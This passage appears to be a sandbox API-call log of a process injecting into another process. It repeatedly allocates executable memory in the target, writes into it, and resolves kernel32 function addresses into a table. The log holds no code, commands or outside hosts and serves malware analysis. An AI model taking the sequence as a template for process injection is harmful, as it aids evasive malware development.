	[0197.624] ReadProcessMemory (in: hProcess=0x4a8, lpBaseAddress=0x60000, lpBuffer=0x12851c, nSize=0x70, lpNumberOfBytesRead=0x1284fc | out: lpBuffer=0x12851c*, lpNumberOfBytesRead=0x1284fc*=0x70) returned 1
	[0197.624] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x10) returned 0x22ff4f8
	[0197.624] VirtualAllocEx (hProcess=0x4a8, lpAddress=0x0, dwSize=0x10, flAllocationType=0x3000, flProtect=0x40) returned 0xe0000
	[0197.624] WriteProcessMemory (in: hProcess=0x4a8, lpBaseAddress=0xe0000, lpBuffer=0x22ff4f8*, nSize=0x10, lpNumberOfBytesWritten=0x1284f4 | out: lpBuffer=0x22ff4f8*, lpNumberOfBytesWritten=0x1284f4*=0x10) returned 1
	[0197.625] WriteProcessMemory (in: hProcess=0x4a8, lpBaseAddress=0x60000, lpBuffer=0x12851c*, nSize=0x70, lpNumberOfBytesWritten=0x1284f4 | out: lpBuffer=0x12851c*, lpNumberOfBytesWritten=0x1284f4*=0x70) returned 1
	[0197.625] ResetEvent (hEvent=0x498) returned 1
	[0197.625] SignalObjectAndWait (hObjectToSignal=0x4cc, hObjectToWaitOn=0x498, dwMilliseconds=0x7530, bAlertable=0) returned 0x0
	[0197.625] ReadProcessMemory (in: hProcess=0x4a8, lpBaseAddress=0x60000, lpBuffer=0x12851c, nSize=0x70, lpNumberOfBytesRead=0x1284f4 | out: lpBuffer=0x12851c*, lpNumberOfBytesRead=0x1284f4*=0x70) returned 1
	[0197.625] VirtualFreeEx (hProcess=0x4a8, lpAddress=0xe0000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0197.625] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x22ff4f8) returned 1
	[0197.625] VirtualFreeEx (hProcess=0x4a8, lpAddress=0x20000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0197.625] WriteProcessMemory (in: hProcess=0x4a8, lpBaseAddress=0x100ca0cc, lpBuffer=0x12879c*, nSize=0x4, lpNumberOfBytesWritten=0x1286e4 | out: lpBuffer=0x12879c*, lpNumberOfBytesWritten=0x1286e4*=0x4) returned 1
	[0197.626] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x76b10000
	[0197.626] GetProcAddress (hModule=0x76b10000, lpProcName="GetProcAddress") returned 0x76b633d3
	[0197.626] lstrlenA (lpString="HeapReAlloc") returned 11
	[0197.626] VirtualAllocEx (hProcess=0x4a8, lpAddress=0x0, dwSize=0xc, flAllocationType=0x3000, flProtect=0x40) returned 0x20000
	[0197.626] WriteProcessMemory (in: hProcess=0x4a8, lpBaseAddress=0x20000, lpBuffer=0x30bc028*, nSize=0xc, lpNumberOfBytesWritten=0x12857c | out: lpBuffer=0x30bc028*, lpNumberOfBytesWritten=0x12857c*=0xc) returned 1
	[0197.626] ReadProcessMemory (in: hProcess=0x4a8, lpBaseAddress=0x60000, lpBuffer=0x12851c, nSize=0x70, lpNumberOfBytesRead=0x1284fc | out: lpBuffer=0x12851c*, lpNumberOfBytesRead=0x1284fc*=0x70) returned 1
	[0197.626] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x10) returned 0x22ff4f8
	[0197.626] VirtualAllocEx (hProcess=0x4a8, lpAddress=0x0, dwSize=0x10, flAllocationType=0x3000, flProtect=0x40) returned 0xe0000
	[0197.627] WriteProcessMemory (in: hProcess=0x4a8, lpBaseAddress=0xe0000, lpBuffer=0x22ff4f8*, nSize=0x10, lpNumberOfBytesWritten=0x1284f4 | out: lpBuffer=0x22ff4f8*, lpNumberOfBytesWritten=0x1284f4*=0x10) returned 1
	[0197.627] WriteProcessMemory (in: hProcess=0x4a8, lpBaseAddress=0x60000, lpBuffer=0x12851c*, nSize=0x70, lpNumberOfBytesWritten=0x1284f4 | out: lpBuffer=0x12851c*, lpNumberOfBytesWritten=0x1284f4*=0x70) returned 1
	[0197.627] ResetEvent (hEvent=0x498) returned 1
	[0197.627] SignalObjectAndWait (hObjectToSignal=0x4cc, hObjectToWaitOn=0x498, dwMilliseconds=0x7530, bAlertable=0) returned 0x0
	[0197.627] ReadProcessMemory (in: hProcess=0x4a8, lpBaseAddress=0x60000, lpBuffer=0x12851c, nSize=0x70, lpNumberOfBytesRead=0x1284f4 | out: lpBuffer=0x12851c*, lpNumberOfBytesRead=0x1284f4*=0x70) returned 1
	[0197.627] VirtualFreeEx (hProcess=0x4a8, lpAddress=0xe0000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0197.627] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x22ff4f8) returned 1
	[0197.627] VirtualFreeEx (hProcess=0x4a8, lpAddress=0x20000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0197.628] WriteProcessMemory (in: hProcess=0x4a8, lpBaseAddress=0x100ca0d0, lpBuffer=0x12879c*, nSize=0x4, lpNumberOfBytesWritten=0x1286e4 | out: lpBuffer=0x12879c*, lpNumberOfBytesWritten=0x1286e4*=0x4) returned 1
	[0197.628] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x76b10000
	[0197.628] GetProcAddress (hModule=0x76b10000, lpProcName="GetProcAddress") returned 0x76b633d3
	[0197.628] lstrlenA (lpString="GetSystemInfo") returned 13
	[0197.628] VirtualAllocEx (hProcess=0x4a8, lpAddress=0x0, dwSize=0xe, flAllocationType=0x3000, flProtect=0x40) returned 0x20000
	[0197.628] WriteProcessMemory (in: hProcess=0x4a8, lpBaseAddress=0x20000, lpBuffer=0x30bc036*, nSize=0xe, lpNumberOfBytesWritten=0x12857c | out: lpBuffer=0x30bc036*, lpNumberOfBytesWritten=0x12857c*=0xe) returned 1
	[0197.629] ReadProcessMemory (in: hProcess=0x4a8, lpBaseAddress=0x60000, lpBuffer=0x12851c, nSize=0x70, lpNumberOfBytesRead=0x1284fc | out: lpBuffer=0x12851c*, lpNumberOfBytesRead=0x1284fc*=0x70) returned 1
	[0197.629] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x10) returned 0x22ff4f8
	[0197.629] VirtualAllocEx (hProcess=0x4a8, lpAddress=0x0, dwSize=0x10, flAllocationType=0x3000, flProtect=0x40) returned 0xe0000
	[0197.629] WriteProcessMemory (in: hProcess=0x4a8, lpBaseAddress=0xe0000, lpBuffer=0x22ff4f8*, nSize=0x10, lpNumberOfBytesWritten=0x1284f4 | out: lpBuffer=0x22ff4f8*, lpNumberOfBytesWritten=0x1284f4*=0x10) returned 1
	[0197.629] WriteProcessMemory (in: hProcess=0x4a8, lpBaseAddress=0x60000, lpBuffer=0x12851c*, nSize=0x70, lpNumberOfBytesWritten=0x1284f4 | out: lpBuffer=0x12851c*, lpNumberOfBytesWritten=0x1284f4*=0x70) returned 1
	[0197.629] ResetEvent (hEvent=0x498) returned 1
	[0197.629] SignalObjectAndWait (hObjectToSignal=0x4cc, hObjectToWaitOn=0x498, dwMilliseconds=0x7530, bAlertable=0) returned 0x0
	[0197.629] ReadProcessMemory (in: hProcess=0x4a8, lpBaseAddress=0x60000, lpBuffer=0x12851c, nSize=0x70, lpNumberOfBytesRead=0x1284f4 | out: lpBuffer=0x12851c*, lpNumberOfBytesRead=0x1284f4*=0x70) returned 1
	[0197.630] VirtualFreeEx (hProcess=0x4a8, lpAddress=0xe0000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0197.630] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x22ff4f8) returned 1
	[0197.630] VirtualFreeEx (hProcess=0x4a8, lpAddress=0x20000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0197.630] WriteProcessMemory (in: hProcess=0x4a8, lpBaseAddress=0x100ca0d4, lpBuffer=0x12879c*, nSize=0x4, lpNumberOfBytesWritten=0x1286e4 | out: lpBuffer=0x12879c*, lpNumberOfBytesWritten=0x1286e4*=0x4) returned 1
	[0197.630] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x76b10000
	[0197.630] GetProcAddress (hModule=0x76b10000, lpProcName="GetProcAddress") returned 0x76b633d3
	[0197.630] lstrlenA (lpString="HeapAlloc") returned 9
	[0197.630] VirtualAllocEx (hProcess=0x4a8, lpAddress=0x0, dwSize=0xa, flAllocationType=0x3000, flProtect=0x40) returned 0x20000
	[0197.630] WriteProcessMemory (in: hProcess=0x4a8, lpBaseAddress=0x20000, lpBuffer=0x30bc046*, nSize=0xa, lpNumberOfBytesWritten=0x12857c | out: lpBuffer=0x30bc046*, lpNumberOfBytesWritten=0x12857c*=0xa) returned 1
	[0197.631] ReadProcessMemory (in: hProcess=0x4a8, lpBaseAddress=0x60000, lpBuffer=0x12851c, nSize=0x70, lpNumberOfBytesRead=0x1284fc | out: lpBuffer=0x12851c*, lpNumberOfBytesRead=0x1284fc*=0x70) returned 1
	[0197.631] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x10) returned 0x22ff4f8
	[0197.631] VirtualAllocEx (hProcess=0x4a8, lpAddress=0x0, dwSize=0x10, flAllocationType=0x3000, flProtect=0x40) returned 0xe0000
	[0197.631] WriteProcessMemory (in: hProcess=0x4a8, lpBaseAddress=0xe0000, lpBuffer=0x22ff4f8*, nSize=0x10, lpNumberOfBytesWritten=0x1284f4 | out: lpBuffer=0x22ff4f8*, lpNumberOfBytesWritten=0x1284f4*=0x10) returned 1
	[0197.631] WriteProcessMemory (in: hProcess=0x4a8, lpBaseAddress=0x60000, lpBuffer=0x12851c*, nSize=0x70, lpNumberOfBytesWritten=0x1284f4 | out: lpBuffer=0x12851c*, lpNumberOfBytesWritten=0x1284f4*=0x70) returned 1
	[0197.631] ResetEvent (hEvent=0x498) returned 1
	[0197.631] SignalObjectAndWait (hObjectToSignal=0x4cc, hObjectToWaitOn=0x498, dwMilliseconds=0x7530, bAlertable=0) returned 0x0
	[0197.632] ReadProcessMemory (in: hProcess=0x4a8, lpBaseAddress=0x60000, lpBuffer=0x12851c, nSize=0x70, lpNumberOfBytesRead=0x1284f4 | out: lpBuffer=0x12851c*, lpNumberOfBytesRead=0x1284f4*=0x70) returned 1
	[0197.632] VirtualFreeEx (hProcess=0x4a8, lpAddress=0xe0000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0197.632] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x22ff4f8) returned 1
	[0197.632] VirtualFreeEx (hProcess=0x4a8, lpAddress=0x20000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0197.632] WriteProcessMemory (in: hProcess=0x4a8, lpBaseAddress=0x100ca0d8, lpBuffer=0x12879c*, nSize=0x4, lpNumberOfBytesWritten=0x1286e4 | out: lpBuffer=0x12879c*, lpNumberOfBytesWritten=0x1286e4*=0x4) returned 1
	[0197.632] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x76b10000
	[0197.632] GetProcAddress (hModule=0x76b10000, lpProcName="GetProcAddress") returned 0x76b633d3
	[0197.632] lstrlenA (lpString="HeapCompact") returned 11
	[0197.632] VirtualAllocEx (hProcess=0x4a8, lpAddress=0x0, dwSize=0xc, flAllocationType=0x3000, flProtect=0x40) returned 0x20000
	[0197.633] WriteProcessMemory (in: hProcess=0x4a8, lpBaseAddress=0x20000, lpBuffer=0x30bc052*, nSize=0xc, lpNumberOfBytesWritten=0x12857c | out: lpBuffer=0x30bc052*, lpNumberOfBytesWritten=0x12857c*=0xc) returned 1
	[0197.633] ReadProcessMemory (in: hProcess=0x4a8, lpBaseAddress=0x60000, lpBuffer=0x12851c, nSize=0x70, lpNumberOfBytesRead=0x1284fc | out: lpBuffer=0x12851c*, lpNumberOfBytesRead=0x1284fc*=0x70) returned 1
	[0197.633] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x10) returned 0x22ff4f8
	[0197.633] VirtualAllocEx (hProcess=0x4a8, lpAddress=0x0, dwSize=0x10, flAllocationType=0x3000, flProtect=0x40) returned 0xe0000
	[0197.633] WriteProcessMemory (in: hProcess=0x4a8, lpBaseAddress=0xe0000, lpBuffer=0x22ff4f8*, nSize=0x10, lpNumberOfBytesWritten=0x1284f4 | out: lpBuffer=0x22ff4f8*, lpNumberOfBytesWritten=0x1284f4*=0x10) returned 1
	[0197.633] WriteProcessMemory (in: hProcess=0x4a8, lpBaseAddress=0x60000, lpBuffer=0x12851c*, nSize=0x70, lpNumberOfBytesWritten=0x1284f4 | out: lpBuffer=0x12851c*, lpNumberOfBytesWritten=0x1284f4*=0x70) returned 1
	[0197.634] ResetEvent (hEvent=0x498) returned 1
	[0197.634] SignalObjectAndWait (hObjectToSignal=0x4cc, hObjectToWaitOn=0x498, dwMilliseconds=0x7530, bAlertable=0) returned 0x0
	[0197.634] ReadProcessMemory (in: hProcess=0x4a8, lpBaseAddress=0x60000, lpBuffer=0x12851c, nSize=0x70, lpNumberOfBytesRead=0x1284f4 | out: lpBuffer=0x12851c*, lpNumberOfBytesRead=0x1284f4*=0x70) returned 1
	[0197.634] VirtualFreeEx (hProcess=0x4a8, lpAddress=0xe0000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0197.634] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x22ff4f8) returned 1
	[0197.634] VirtualFreeEx (hProcess=0x4a8, lpAddress=0x20000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0197.634] WriteProcessMemory (in: hProcess=0x4a8, lpBaseAddress=0x100ca0dc, lpBuffer=0x12879c*, nSize=0x4, lpNumberOfBytesWritten=0x1286e4 | out: lpBuffer=0x12879c*, lpNumberOfBytesWritten=0x1286e4*=0x4) returned 1
	[0197.634] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x76b10000
	[0197.635] GetProcAddress (hModule=0x76b10000, lpProcName="GetProcAddress") returned 0x76b633d3
	[0197.635] lstrlenA (lpString="HeapDestroy") returned 11
	[0197.635] VirtualAllocEx (hProcess=0x4a8, lpAddress=0x0, dwSize=0xc, flAllocationType=0x3000, flProtect=0x40) returned 0x20000
	[0197.635] WriteProcessMemory (in: hProcess=0x4a8, lpBaseAddress=0x20000, lpBuffer=0x30bc060*, nSize=0xc, lpNumberOfBytesWritten=0x12857c | out: lpBuffer=0x30bc060*, lpNumberOfBytesWritten=0x12857c*=0xc) returned 1
	[0197.635] ReadProcessMemory (in: hProcess=0x4a8, lpBaseAddress=0x60000, lpBuffer=0x12851c, nSize=0x70, lpNumberOfBytesRead=0x1284fc | out: lpBuffer=0x12851c*, lpNumberOfBytesRead=0x1284fc*=0x70) returned 1
	[0197.635] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x10) returned 0x22ff4f8
	[0197.635] VirtualAllocEx (hProcess=0x4a8, lpAddress=0x0, dwSize=0x10, flAllocationType=0x3000, flProtect=0x40) returned 0xe0000
	[0197.635] WriteProcessMemory (in: hProcess=0x4a8, lpBaseAddress=0xe0000, lpBuffer=0x22ff4f8*, nSize=0x10, lpNumberOfBytesWritten=0x1284f4 | out: lpBuffer=0x22ff4f8*, lpNumberOfBytesWritten=0x1284f4*=0x10) returned 1
	[0197.635] WriteProcessMemory (in: hProcess=0x4a8, lpBaseAddress=0x60000, lpBuffer=0x12851c*, nSize=0x70, lpNumberOfBytesWritten=0x1284f4 | out: lpBuffer=0x12851c*, lpNumberOfBytesWritten=0x1284f4*=0x70) returned 1
	[0197.636] ResetEvent (hEvent=0x498) returned 1
	[0197.636] SignalObjectAndWait (hObjectToSignal=0x4cc, hObjectToWaitOn=0x498, dwMilliseconds=0x7530, bAlertable=0) returned 0x0
	[0197.636] ReadProcessMemory (in: hProcess=0x4a8, lpBaseAddress=0x60000, lpBuffer=0x12851c, nSize=0x70, lpNumberOfBytesRead=0x1284f4 | out: lpBuffer=0x12851c*, lpNumberOfBytesRead=0x1284f4*=0x70) returned 1
	[0197.636] VirtualFreeEx (hProcess=0x4a8, lpAddress=0xe0000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0197.636] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x22ff4f8) returned 1
	[0197.636] VirtualFreeEx (hProcess=0x4a8, lpAddress=0x20000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0197.636] WriteProcessMemory (in: hProcess=0x4a8, lpBaseAddress=0x100ca0e0, lpBuffer=0x12879c*, nSize=0x4, lpNumberOfBytesWritten=0x1286e4 | out: lpBuffer=0x12879c*, lpNumberOfBytesWritten=0x1286e4*=0x4) returned 1
	[0197.637] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x76b10000
	[0197.637] GetProcAddress (hModule=0x76b10000, lpProcName="GetProcAddress") returned 0x76b633d3
	[0197.637] lstrlenA (lpString="UnlockFile") returned 10
	[0197.637] VirtualAllocEx (hProcess=0x4a8, lpAddress=0x0, dwSize=0xb, flAllocationType=0x3000, flProtect=0x40) returned 0x20000
	[0197.637] WriteProcessMemory (in: hProcess=0x4a8, lpBaseAddress=0x20000, lpBuffer=0x30bc06e*, nSize=0xb, lpNumberOfBytesWritten=0x12857c | out: lpBuffer=0x30bc06e*, lpNumberOfBytesWritten=0x12857c*=0xb) returned 1
	[0197.638] ReadProcessMemory (in: hProcess=0x4a8, lpBaseAddress=0x60000, lpBuffer=0x12851c, nSize=0x70, lpNumberOfBytesRead=0x1284fc | out: lpBuffer=0x12851c*, lpNumberOfBytesRead=0x1284fc*=0x70) returned 1
	[0197.638] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x10) returned 0x22ff4f8
	[0197.638] VirtualAllocEx (hProcess=0x4a8, lpAddress=0x0, dwSize=0x10, flAllocationType=0x3000, flProtect=0x40) returned 0xe0000
	[0197.638] WriteProcessMemory (in: hProcess=0x4a8, lpBaseAddress=0xe0000, lpBuffer=0x22ff4f8*, nSize=0x10, lpNumberOfBytesWritten=0x1284f4 | out: lpBuffer=0x22ff4f8*, lpNumberOfBytesWritten=0x1284f4*=0x10) returned 1
	[0197.638] WriteProcessMemory (in: hProcess=0x4a8, lpBaseAddress=0x60000, lpBuffer=0x12851c*, nSize=0x70, lpNumberOfBytesWritten=0x1284f4 | out: lpBuffer=0x12851c*, lpNumberOfBytesWritten=0x1284f4*=0x70) returned 1
	[0197.638] ResetEvent (hEvent=0x498) returned 1
	[0197.638] SignalObjectAndWait (hObjectToSignal=0x4cc, hObjectToWaitOn=0x498, dwMilliseconds=0x7530, bAlertable=0) returned 0x0
	[0197.639] ReadProcessMemory (in: hProcess=0x4a8, lpBaseAddress=0x60000, lpBuffer=0x12851c, nSize=0x70, lpNumberOfBytesRead=0x1284f4 | out: lpBuffer=0x12851c*, lpNumberOfBytesRead=0x1284f4*=0x70) returned 1
	[0197.639] VirtualFreeEx (hProcess=0x4a8, lpAddress=0xe0000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0197.639] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x22ff4f8) returned 1
	[0197.639] VirtualFreeEx (hProcess=0x4a8, lpAddress=0x20000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0197.639] WriteProcessMemory (in: hProcess=0x4a8, lpBaseAddress=0x100ca0e4, lpBuffer=0x12879c*, nSize=0x4, lpNumberOfBytesWritten=0x1286e4 | out: lpBuffer=0x12879c*, lpNumberOfBytesWritten=0x1286e4*=0x4) returned 1
	[0197.639] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x76b10000
	[0197.639] GetProcAddress (hModule=0x76b10000, lpProcName="GetProcAddress") returned 0x76b633d3
	[0197.639] lstrlenA (lpString="CreateFileMappingA") returned 18
	[0197.639] VirtualAllocEx (hProcess=0x4a8, lpAddress=0x0, dwSize=0x13, flAllocationType=0x3000, flProtect=0x40) returned 0x20000
	[0197.640] WriteProcessMemory (in: hProcess=0x4a8, lpBaseAddress=0x20000, lpBuffer=0x30bc07c*, nSize=0x13, lpNumberOfBytesWritten=0x12857c | out: lpBuffer=0x30bc07c*, lpNumberOfBytesWritten=0x12857c*=0x13) returned 1
	[0197.640] ReadProcessMemory (in: hProcess=0x4a8, lpBaseAddress=0x60000, lpBuffer=0x12851c, nSize=0x70, lpNumberOfBytesRead=0x1284fc | out: lpBuffer=0x12851c*, lpNumberOfBytesRead=0x1284fc*=0x70) returned 1
	[0197.640] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x10) returned 0x22ff4f8
	[0197.640] VirtualAllocEx (hProcess=0x4a8, lpAddress=0x0, dwSize=0x10, flAllocationType=0x3000, flProtect=0x40) returned 0xe0000
	[0197.640] WriteProcessMemory (in: hProcess=0x4a8, lpBaseAddress=0xe0000, lpBuffer=0x22ff4f8*, nSize=0x10, lpNumberOfBytesWritten=0x1284f4 | out: lpBuffer=0x22ff4f8*, lpNumberOfBytesWritten=0x1284f4*=0x10) returned 1
	[0197.640] WriteProcessMemory (in: hProcess=0x4a8, lpBaseAddress=0x60000, lpBuffer=0x12851c*, nSize=0x70, lpNumberOfBytesWritten=0x1284f4 | out: lpBuffer=0x12851c*, lpNumberOfBytesWritten=0x1284f4*=0x70) returned 1
	[0197.641] ResetEvent (hEvent=0x498) returned 1
	[0197.641] SignalObjectAndWait (hObjectToSignal=0x4cc, hObjectToWaitOn=0x498, dwMilliseconds=0x7530, bAlertable=0) returned 0x0
	[0197.641] ReadProcessMemory (in: hProcess=0x4a8, lpBaseAddress=0x60000, lpBuffer=0x12851c, nSize=0x70, lpNumberOfBytesRead=0x1284f4 | out: lpBuffer=0x12851c*, lpNumberOfBytesRead=0x1284f4*=0x70) returned 1
	[0197.641] VirtualFreeEx (hProcess=0x4a8, lpAddress=0xe0000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0197.641] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x22ff4f8) returned 1
	[0197.641] VirtualFreeEx (hProcess=0x4a8, lpAddress=0x20000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0197.641] WriteProcessMemory (in: hProcess=0x4a8, lpBaseAddress=0x100ca0e8, lpBuffer=0x12879c*, nSize=0x4, lpNumberOfBytesWritten=0x1286e4 | out: lpBuffer=0x12879c*, lpNumberOfBytesWritten=0x1286e4*=0x4) returned 1
	[0197.642] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x76b10000
	[0197.642] GetProcAddress (hModule=0x76b10000, lpProcName="GetProcAddress") returned 0x76b633d3
	[0197.642] lstrlenA (lpString="LockFileEx") returned 10
	[0197.642] VirtualAllocEx (hProcess=0x4a8, lpAddress=0x0, dwSize=0xb, flAllocationType=0x3000, flProtect=0x40) returned 0x20000
	[0197.642] WriteProcessMemory (in: hProcess=0x4a8, lpBaseAddress=0x20000, lpBuffer=0x30bc092*, nSize=0xb, lpNumberOfBytesWritten=0x12857c | out: lpBuffer=0x30bc092*, lpNumberOfBytesWritten=0x12857c*=0xb) returned 1
	[0197.642] ReadProcessMemory (in: hProcess=0x4a8, lpBaseAddress=0x60000, lpBuffer=0x12851c, nSize=0x70, lpNumberOfBytesRead=0x1284fc | out: lpBuffer=0x12851c*, lpNumberOfBytesRead=0x1284fc*=0x70) returned 1
	[0197.642] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x10) returned 0x22ff4f8
	[0197.642] VirtualAllocEx (hProcess=0x4a8, lpAddress=0x0, dwSize=0x10, flAllocationType=0x3000, flProtect=0x40) returned 0xe0000
	[0197.642] WriteProcessMemory (in: hProcess=0x4a8, lpBaseAddress=0xe0000, lpBuffer=0x22ff4f8*, nSize=0x10, lpNumberOfBytesWritten=0x1284f4 | out: lpBuffer=0x22ff4f8*, lpNumberOfBytesWritten=0x1284f4*=0x10) returned 1
	[0197.643] WriteProcessMemory (in: hProcess=0x4a8, lpBaseAddress=0x60000, lpBuffer=0x12851c*, nSize=0x70, lpNumberOfBytesWritten=0x1284f4 | out: lpBuffer=0x12851c*, lpNumberOfBytesWritten=0x1284f4*=0x70) returned 1
	[0197.643] ResetEvent (hEvent=0x498) returned 1
	[0197.643] SignalObjectAndWait (hObjectToSignal=0x4cc, hObjectToWaitOn=0x498, dwMilliseconds=0x7530, bAlertable=0) returned 0x0
	[0197.643] ReadProcessMemory (in: hProcess=0x4a8, lpBaseAddress=0x60000, lpBuffer=0x12851c, nSize=0x70, lpNumberOfBytesRead=0x1284f4 | out: lpBuffer=0x12851c*, lpNumberOfBytesRead=0x1284f4*=0x70) returned 1
	[0197.643] VirtualFreeEx (hProcess=0x4a8, lpAddress=0xe0000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0197.643] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x22ff4f8) returned 1
	[0197.644] VirtualFreeEx (hProcess=0x4a8, lpAddress=0x20000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0197.644] WriteProcessMemory (in: hProcess=0x4a8, lpBaseAddress=0x100ca0ec, lpBuffer=0x12879c*, nSize=0x4, lpNumberOfBytesWritten=0x1286e4 | out: lpBuffer=0x12879c*, lpNumberOfBytesWritten=0x1286e4*=0x4) returned 1
	[0197.644] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x76b10000
	[0197.644] GetProcAddress (hModule=0x76b10000, lpProcName="GetProcAddress") returned 0x76b633d3
	[0197.644] lstrlenA (lpString="GetFileSize") returned 11
	[0197.644] VirtualAllocEx (hProcess=0x4a8, lpAddress=0x0, dwSize=0xc, flAllocationType=0x3000, flProtect=0x40) returned 0x20000
	[0197.644] WriteProcessMemory (in: hProcess=0x4a8, lpBaseAddress=0x20000, lpBuffer=0x30bc0a0*, nSize=0xc, lpNumberOfBytesWritten=0x12857c | out: lpBuffer=0x30bc0a0*, lpNumberOfBytesWritten=0x12857c*=0xc) returned 1
	[0197.645] ReadProcessMemory (in: hProcess=0x4a8, lpBaseAddress=0x60000, lpBuffer=0x12851c, nSize=0x70, lpNumberOfBytesRead=0x1284fc | out: lpBuffer=0x12851c*, lpNumberOfBytesRead=0x1284fc*=0x70) returned 1
	[0197.645] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x10) returned 0x22ff4f8
	[0197.645] VirtualAllocEx (hProcess=0x4a8, lpAddress=0x0, dwSize=0x10, flAllocationType=0x3000, flProtect=0x40) returned 0xe0000
	[0197.645] WriteProcessMemory (in: hProcess=0x4a8, lpBaseAddress=0xe0000, lpBuffer=0x22ff4f8*, nSize=0x10, lpNumberOfBytesWritten=0x1284f4 | out: lpBuffer=0x22ff4f8*, lpNumberOfBytesWritten=0x1284f4*=0x10) returned 1
	[0197.645] WriteProcessMemory (in: hProcess=0x4a8, lpBaseAddress=0x60000, lpBuffer=0x12851c*, nSize=0x70, lpNumberOfBytesWritten=0x1284f4 | out: lpBuffer=0x12851c*, lpNumberOfBytesWritten=0x1284f4*=0x70) returned 1
	[0197.646] ResetEvent (hEvent=0x498) returned 1
	[0197.646] SignalObjectAndWait (hObjectToSignal=0x4cc, hObjectToWaitOn=0x498, dwMilliseconds=0x7530, bAlertable=0) returned 0x0
	[0197.646] ReadProcessMemory (in: hProcess=0x4a8, lpBaseAddress=0x60000, lpBuffer=0x12851c, nSize=0x70, lpNumberOfBytesRead=0x1284f4 | out: lpBuffer=0x12851c*, lpNumberOfBytesRead=0x1284f4*=0x70) returned 1
	[0197.646] VirtualFreeEx (hProcess=0x4a8, lpAddress=0xe0000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0197.646] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x22ff4f8) returned 1
	[0197.646] VirtualFreeEx (hProcess=0x4a8, lpAddress=0x20000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0197.646] WriteProcessMemory (in: hProcess=0x4a8, lpBaseAddress=0x100ca0f0, lpBuffer=0x12879c*, nSize=0x4, lpNumberOfBytesWritten=0x1286e4 | out: lpBuffer=0x12879c*, lpNumberOfBytesWritten=0x1286e4*=0x4) returned 1
	[0197.646] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x76b10000
	[0197.647] GetProcAddress (hModule=0x76b10000, lpProcName="GetProcAddress") returned 0x76b633d3
	[0197.647] lstrlenA (lpString="GetCurrentProcessId") returned 19
	[0197.647] VirtualAllocEx (hProcess=0x4a8, lpAddress=0x0, dwSize=0x14, flAllocationType=0x3000, flProtect=0x40) returned 0x20000
	[0197.647] WriteProcessMemory (in: hProcess=0x4a8, lpBaseAddress=0x20000, lpBuffer=0x30bc0ae*, nSize=0x14, lpNumberOfBytesWritten=0x12857c | out: lpBuffer=0x30bc0ae*, lpNumberOfBytesWritten=0x12857c*=0x14) returned 1
	[0197.647] ReadProcessMemory (in: hProcess=0x4a8, lpBaseAddress=0x60000, lpBuffer=0x12851c, nSize=0x70, lpNumberOfBytesRead=0x1284fc | out: lpBuffer=0x12851c*, lpNumberOfBytesRead=0x1284fc*=0x70) returned 1
	[0197.647] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x10) returned 0x22ff4f8
	[0197.647] VirtualAllocEx (hProcess=0x4a8, lpAddress=0x0, dwSize=0x10, flAllocationType=0x3000, flProtect=0x40) returned 0xe0000
	[0197.647] WriteProcessMemory (in: hProcess=0x4a8, lpBaseAddress=0xe0000, lpBuffer=0x22ff4f8*, nSize=0x10, lpNumberOfBytesWritten=0x1284f4 | out: lpBuffer=0x22ff4f8*, lpNumberOfBytesWritten=0x1284f4*=0x10) returned 1
